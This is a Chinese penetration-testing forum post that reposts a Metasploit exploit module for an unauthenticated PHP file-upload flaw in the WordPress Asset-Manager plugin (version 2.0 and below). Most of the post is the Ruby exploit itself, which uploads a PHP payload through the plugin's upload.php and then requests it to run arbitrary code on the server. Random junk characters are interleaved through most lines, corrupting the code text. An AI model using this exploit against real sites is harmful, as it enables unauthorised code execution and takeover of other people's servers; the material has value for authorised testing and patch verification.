找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 WordPress Asset-Manager PHP文件上传漏洞
返回列表 发新帖
查看: 2804|回复: 0
打印 上一主题 下一主题

WordPress Asset-Manager PHP文件上传漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-31 09:22:33 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。  v/ F  k( W( a! G

7 U$ `8 y) ~9 u4 H' l% J##
% ^6 {6 ^" ~- T: N7 G# This file is part of the Metasploit Framework and may be subject to* z- c9 A7 C' X6 ~8 r, o9 ]
# redistribution and commercial restrictions. Please see the Metasploit
/ N- g$ T* e; O9 l# Framework web site for more information on licensing and terms of use.
: E: d2 k. O$ p* x: ?#   http://metasploit.com/framework/
6 Y$ \( Q- `9 L9 V" ?7 m& ^2 j+ q##8 L1 H% {8 ?3 J& x2 |
: U5 t8 t& c, T
require 'msf/core'
6 R( a! G0 E% i* Y& N: prequire 'msf/core/exploit/php_exe'
5 a  F; l( T$ V7 B9 N# W
. l3 h! G0 n4 M! ^% Eclass Metasploit3 < Msf::Exploit::Remote) d& ~" Q5 T8 |
  Rank = ExcellentRanking1 u. B. l- y2 ^( }, n5 d1 X
5 I- E/ x1 P  p; n" J
  include Msf::Exploit::Remote::HttpClient9 i2 s* o1 |: Y& r1 K5 ^1 p
  include Msf::Exploit:hpEXE
; B% v& k2 j) h; f) @- `: \
) I5 ?( _& R. Z3 |1 z  def initialize(info = {})
3 [6 f6 H* F% V$ r& Q" f% E% d    super(update_info(info,
9 p: D9 M; x! c$ E* e- h      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability'," n3 `$ L7 p  M& ?# b* d
      'Description'    => %q{
4 X5 }6 d+ M; D% c1 `. E9 l, w1 k        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress
- J& o# z, `4 d) \) [2 j* M1 P        plugin.  By abusing the upload.php file, a malicious user can upload a file to a" {1 |# t& z/ Z7 H9 R( s
        temp directory without authentication, which results in arbitrary code execution.
# A  M) x& s" t  n/ T( S      },
+ j+ ]- N+ `. w. S* X: Q5 H0 d      'Author'         =>& Z, Y8 i1 N; R: K9 B5 H
        [7 |& M* N3 H- S( I: ^8 X
          'Sammy FORGIT', # initial discovery; f, t+ {$ `: k& o8 B' B0 n0 O' ^
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
  e3 W2 H6 d3 V5 N; k$ C        ],) W- `2 f1 |' a7 ]7 L! `
      'License'        => MSF_LICENSE,( Z! R- O/ `" N" |6 v! }# ~
      'References'     =>
9 K4 `4 G: N  j; ?, I1 s! d$ x2 n        [
$ w; z  ~  r6 O" ~          [ 'OSVDB', '82653' ],
1 f4 n( \6 l7 e3 P          [ 'BID', '53809' ],& W& N' A5 R1 [: T  Q" O9 L
          [ 'EDB', '18993' ],
5 q3 ~3 j5 A; A$ @3 ^          [ 'URL', 'http:// www.myhack58.com /' ]+ q/ ~- x. t: B( \/ z9 I# g# |
        ],) ~: `, k2 d* W1 F" ^$ U( R& O( ?$ Z4 W9 q
      'Payload'       =>
) H" D. P6 v6 q% j: T" K, t        {+ P: ^7 B" T" a& q& n
          'BadChars' => "\x00",
+ w) c5 S4 q9 E2 r! ~        },
, z  \! R( \' e4 H: A, c( W      'Platform'       => 'php',
# G4 }# L1 I0 c6 _      'Arch'           => ARCH_PHP,
  M0 B! Q& s* |$ S! f2 `! y      'Targets'        =>3 Y+ r' W4 c& U( V: n5 Q" p; E- k
        [
* V( P8 k% J1 O5 @5 t8 [          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],* i$ p! D- v+ F2 e0 w- c
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]( I3 T' m: B$ h1 I- u1 C( s7 n& y
        ],
# q: o* N4 l2 V. a& y2 Z      'DefaultTarget' => 0,
" o  ^5 z8 M) p/ |* G3 ]2 c, Z      'DisclosureDate' => 'May 26 2012'))
6 y4 `. C/ j" d% k( R 0 ?; z- f( B- ^0 s" ]4 ?
    register_options(
9 M0 z4 v) `) E      [0 ]) S1 V8 }2 b! B/ k# ^6 J
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
0 u9 E  V; H( N5 b6 o      ], self.class)! K" C+ D5 [) D9 G
  end- b( x$ E/ G- S4 L6 u5 z; ?) g. n" H( r

9 [+ I6 T( ?; M; F$ W  m  def exploit
1 q' [' F) G  q    uri =  target_uri.path& u0 e5 Y) w# ]+ V. W7 n# u
    uri << '/' if uri[-1,1] != '/'% b; {- \# r; Y5 T: i
    peer = "#{rhost}:#{rport}"
4 w+ l5 ?0 m, Y: K    payload_name = "#{rand_text_alpha(5)}.php"
) b. F' u1 ]* \% Q    php_payload = get_write_exec_payload(:unlink_self=>true)
0 b. ~5 A; Y* W3 ?; g# F5 |
3 Z5 y3 p5 D6 [- Y7 r: g4 h    data = Rex::MIME::Message.new
$ s+ r% B& N, }9 x" F$ ~* k# Y    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
9 Y3 `9 @. b4 t( v2 A# k6 u8 K/ D    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
# u" S  h; M; y
5 d; g9 Z' E, X    print_status("#{peer} - Uploading payload #{payload_name}")+ s& X+ I2 ^; g3 t2 i
    res = send_request_cgi({+ _7 n6 R3 k; b0 B
      'method'  => 'POST',% Z; i' Q% Q- g
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",2 m' `) S, ]( M) C4 _; M8 [* e
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",. H9 n0 I4 f4 c  A) [3 r
      'data'    => post_data
! u6 Q7 [9 X/ R" T4 W# y    })
; `$ R; }/ b3 |  O
  P1 j- I4 ^2 O/ U4 \% x    if not res or res.code != 200 or res.body !~ /#{payload_name}/
; }1 K& W3 ^. q1 j+ Q      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")! D4 E- ]2 L+ P) Q  S/ `- k+ H
end
! _0 c. R! d% X1 a4 r. x
! p& S4 b. ]! J: @$ n% @    print_status("#{peer} - Executing payload #{payload_name}")
7 X+ M* d+ _) u- j% e( |, X    res = send_request_raw({
2 l5 ^: O& @0 k8 R& d5 s      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",4 A0 n# i( y; `& V
      'method'  => 'GET'
% B6 m$ G- n, B5 r# P* M    })2 @( k8 |: Q, B9 [

+ t2 l+ T2 {* F! T3 Q    if res and res.code != 200" [; y3 R6 k2 p0 X4 k
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")" H, p1 A+ ]- _* f: Y4 v9 B2 k1 X
    end
& V- g% ]( G  Z  end
; Q, z4 S/ X" O* t7 t- J. zend
2 C% H* u+ z+ C8 Q
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表